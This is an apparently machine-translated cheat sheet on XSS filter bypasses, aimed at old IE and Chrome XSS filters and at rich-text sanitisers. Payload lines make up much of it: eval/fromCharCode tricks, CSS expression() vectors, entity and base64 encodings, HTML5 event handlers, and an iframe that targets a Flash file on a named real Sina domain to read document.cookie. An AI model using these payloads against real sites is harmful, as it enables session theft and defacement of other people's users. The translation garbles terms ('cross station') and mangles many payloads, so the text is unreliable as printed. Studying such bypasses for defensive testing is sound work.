1.1 Bypass Char
Often a security-conscious programmer will filter the input a certain amount, it is more common to filter for a key symbol, such as "<" or ">", which in many cases is not able to prevent attacks, and the more secure way is to filter the output of the function provided by the programming language.
This section focuses on the study of single character filtering, which is divided into quotes, angle brackets, parentheses, three symbols. 1.1.1 Quotes
Many vectors (that is, attack vectors) in cross-station testing do not themselves contain quotes, such as vectors below. However, quotation marks are often used in use, and if the quotes are filtered, the following steps can be taken to circumvent them.
Vector
<script>alert (/insight-labs/) </script>
<iframe/onload=alert (/insight-labs/) >
<p Onmouseover=alert (/insight-labs/) >insight-labs here.</p>
1) String.fromCharCode
fromCharCode can encode quotes in code, but it needs to be used in conjunction with the Eval function, for example:
<script>alert (' Insight-labs ') </script>-–> <script>eval (String.fromCharCode ( 97,108,101,114,116,40,39,105,110,115,105,103,104,116,45,108,97,98,115,39,41)) </script>
2) Location.hash
Put quotes in the Location.hash, in fact this can also break the span of the control of the length of the station.
<script>eval (Location.hash.slice (1)) </script> #alert (' a ')
3)/string/.source
A string in/string/represents a regular expression, and with. Source you can take the text form of the regular expression and then use Eval (/string/.source) to execute. 1.1.2 Angle Bracket
Usually the programmer only filters the angle brackets in order to be lazy, so the angle brackets are the most frequently encountered in Cross station filtering. In general, if the input does not appear in other tags, then basically there is no way to attack, but if the output to other tags, you can combine the upper and lower tabs for the following test:
1) Event function
Some commonly used event functions are: OnError, onmouseover, onload, etc. (at the same time can be concerned about the HTML5 of new tags), when needed, the JavaScript event function can be fuzz.
<p Onmouseover=alert (/insight-labs/) >insight-labs here.</p>
<frameset Onload=alert (/insight-labs/) >
<body Onload=alert (/insight-labs/) >
2 style and expression
Cross-station through the tag's style style (only IE succeeds in the test, while also considering the filter problem).
<div style= "width:expression (Alert (' Insight-labs '));" >
3 JavaScript Pseudo-protocol
JavaScript pseudo protocol is bypassed.
(IE6 only) 1.1.3 Bracket
If the parentheses are filtered in the test, or if the parentheses cannot be injected, the following tests can be performed:
1) External files
The introduction of external files through SRC, and the use of code in the external file (where the external file suffix can not be JS).
<script src= ' 1.js ' ></script>
<script src= ' 2.jpg ' ></script>
2) hex, Dec code
Encode using hexadecimal and decimal.
<div style= "& #119 & #105 & #100 & #116 & #104 & #58 & #101 & #120 & #112 & #114 &# 101& #115 & #115 & #105 & #111 & #110 & #40 & #97 & #108 & #101 & #114 & #116 & #40 & #39 & #120 & #115 & #115 & #101 & #114 & #39 & #41 & #41 ″>xsser</div> 1.2 bypass Filter
In response to the growing problem of cross stations, browser vendors from their own browser security launched their own cross-station filters. But such filters basically only support reflective cross stations, and other types of cross stations are basically unaffected.
The defense mechanisms used by various browsers vary. Reflective Cross-station defense: Firefox basically has no defenses, and IE and Chrome have their own defense mechanisms, and are difficult to bypass, here is the main summary of some of the existing can bypass the mechanism. 1.2.1 IE Filter
IE supports XSS Filter from IE7, its overall architecture is visible in reference 1, and the regular matching section can refer to document 2. The actual processing steps can be divided into three steps: First, IE is heuristic filtering (heuristic filters, regular matching); If you match these features in an HTTP request, make a dynamic signature (create dynamic signature) If you have the original signature in the HTTP response, replace the modification (neuter response). Under IE full patch testing, the existing published bypass technology is basically very small, the first summary is as follows:
1) <a href=>
For ordinary reflective cross stations, you can use a tag and "sc%0aript" to achieve bypass, but requires user interaction, where the artist is needed. In fact, the principle is that the page output after the two pages belong to the same domain, so does not produce filtering. If the address in HREF is a different field, it will filter.
<a href= "Xss.php?a=<sc%0aript>alert (/insight-labs/) </script>" >
<a href= "Xss.php?a=<sc%0aript>alert (/insight-labs/) </script>" ><div style= "Position:absolute ; left:0px; top:0px; height:1000px; width:1000px; Padding:1em;background:black;text-align:center; " >click to Continue</div></a>
Http://vulnerabledoma.in/xssable?q =%22%3CA%20HREF%3DJAVASCRIPT%26.X3A's%3balert%26%28x28%3b1%26%29x29%3b//= %3exxx
http://vulnerabledoma.in/xssable?q= "<a href=javascript&.x3a;alert& (x28;1&) x29;//=>xxx
2) Utf7
Through the UTF7-BOM implementation of injection code, the full patch case only if the header code for UTF-7 to be successful, you can refer to the literature 3.
%2baciapga8-script%2bad4-alert%28/insight-labs/%29%2badw-%2fscript%2bad4apaai-&oe=windows-31j
3) Flash
In the www.B.com domain name with an iframe embedded www.A.com flash XSS file. When the victim opens the domain name of www.B.com, we can successfully obtain its cookie data in www.A.com, see document 8.
The test code is as follows (IE):
<iframe/src= "Http://data.house.sina.com.cn/images/price_trend/open-flash-chart.swf?get-data= (function () { Location.href=%22javascript: ' <script>alert (document.cookie) </script> '%22} ' () ></iframe>
In Chrome, the browser may crash, and you can use the following code instead.
<iframe/src= "Http://data.house.sina.com.cn/images/price_trend/open-flash-chart.swf?get-data= (function () { Alert (Document.cookie)}) () "></iframe>
4) MAGIC_QUOTES_GPC
PHP if the "Magic quotes" feature (MAGIC_QUOTES_GPC = ON) is turned on, then ' (Single-quote), "(double quote), \ (backslash) and NULL characters will all be escaped by backslash (%00 =>\0) .
Through some tests, it is found that IE XSS filter escapes the null character, meaning it does not understand the conversion process. See document 9
<script/%00%00v%00%00>alert (1) </script>
%C0 "; alert (%00)//
%c0 "//(%000000%0dalert (1)//1.2.2 Chrome Filter
Chrome browser for XSS filtering rules and IE have a big difference, different versions of the chrome test will be different, the existing data can be referred to 4, 5.
1) Data Protocol
? vuln=<a href= "Javascript:alert (document.cookie);" >click</a>/Will Intercept
–à converted into <a href= "javascript:void (0)" >click</a>
Bypass
? vuln=<a href= "data:text/html;
base64,phnjcmlwdd5hbgvydcgnsgvsbg8gd29ybgqhjyk8l3njcmlwdd4=
">click<a>
-àok 1.3 Bypass RichText
Rich Text common categories have messages, logs or emails. It can be tested and analyzed using existing tags compared to a typical cross station. The general filtering mechanism is divided into two types: blacklist, whitelist, the two types of mechanisms are based on regular matching filter, so in the test process needs to compare input and output, and then to change the specific.
Common test process: Enter common tags and event--> whether there are existing labels that do not filter ——-> Distort or analyze its properties
Characters: javascript:, VBScript:
Events: onload,onerror,on* 1.3.1 Bypass Rule
Some common change rules are categorized in this section, and combined tests are performed in a variety of ways in the actual test.
1) Not recursive filtering
Many rich text filters are for keyword filtering, but there is no recursive filtering, resulting in the filtering of the results of the new label, such as:
<ifra<iframe>me>--Filtration--<iframe> ———-<iframe>
<s<script></script>cript>-– Filtration-<script> ———-<script></script>
2) coding
Bypasses keywords using the 16 and decimal encodings of characters. Since expression only IE can be executed, it is limited to ie.
<div style= "width:expression (Alert (/insight-labs/))" >insight-labs</div>
<div style= "width:\0065xpression (Alert (/insight-labs/))" >insight-labs</div>
Two times different types of code
<div style= "width:\0065xpressio\6e (Alert (/insight-labs/))" >insight-labs</div>
<div style= "& #119 & #105 & #100 & #116 & #104 & #58 & #101 & #120 & #112 & #114 &# 101& #115 & #115 & #105 & #111 & #110 & #40 & #97 & #108 & #101 & #114 & #116 & #40 & #39 & #120 & #115 & #115 & #101 & #114 & #39 & #41 & #41 ″>xsser</div>
3) Special characters
In a constructed vector, you can insert tab, line wrap, other whitespace characters, or "/**" to bypass keyword matching, and are basically limited to ie.
two times Tab,ie6
<div style= "width:exp/**
**/ression (Alert (/insight-labs/)) ">insight-labs</div> IE
4) Very See agreement
Using the object tag, the Date property data is Base64 encoded to bypass critical data, and the object tag is also a frequently forgotten label.
<object data= "data:text/html;base64,phnjcmlwdd5hbgvydcgvaw5zawdodc1sywjzlyk8l3njcmlwdd4=" >
5) HTML5
Using HTML5 new tags or new attributes to bypass, relatively demanding environment for such use is comparatively harsh, see ref. 6.
New Label:<button>,<video>,<audio>,<article>,<footer>,<nav>
New properties: AutoComplete, autofocus, pattern ... etc
<input onfocus=write (1) autofocus>
<video Poster=javascript:alert (1)//></video>
6) Browser aspect
It can be considered from the perspective of browser parsing, requires in-depth analysis of browser parsing, and then improved and analyzed to provide several vectors of this type.
How to annotate IE
<!–[if ie]><! [endif]–>
<comment> IE 1.3.2 Utilization Techniques
In the actual utilization will often encounter some other problems, such as code dead cycle, the length is not enough to sum up the following first:
1) expression
Because the expression property is special and only supports IE, it executes the Eval function equivalent to a dead loop, while the style tag does not appear ";" Characters, that is, you cannot construct more than one JavaScript that joins together, so you construct the following statement:
<div style= "Xss:ex/**/pre/**/ssion (eval (XSS));" Xss= "var then=new Date (); Then.settime (Then.gettime () +10*1000); if (document.cookie.indexOf (' cookie1= ') = = 1) {document.cookie= ' Cookie1=ray; Expires= ' +then.togmtstring (); alert (/insight-labs/);} " >
Set a cookie to expire in 10 seconds and execute other statements or functions in this cookie statement.
You can also implement it through the Window object:
<div style= "width:expression (window.x==1)?":( Window.x=1,alert (/insight-labs/)) ">xsser</div>
2) Length limit
This is explained in detail in the article "breaking the XSS character number limit to execute arbitrary JS Code", reference 7. Of course, browsers that support HTML5 can also take advantage of local storage. Reference documents
1.http://blogs.technet.com/b/srd/archive/2008/08/18/ie-8-xss-filter-architecture-implementation.aspx
2. Abusing Internet Explorer 8′s XSS filters.pdf
3. http://hi.baidu.com/thanks4sec/blog/item/1b06348ae87e2cb10df4d27c.html
4. http://evilcos.me/?p=60
5. http://hi.baidu.com/rayh4c/blog/item/c3fb8d0a6bf93422b1351ddc.html
6. http://html5sec.org/
7. Http://huaidan.org/pstzine/0x03/txt/PSTZine_0x03_0x04.txt
8.http://zone.wooyun.org/content/368
9.http://insight-labs.org/?p=499
Transferred from http://insight-labs.org/?p=533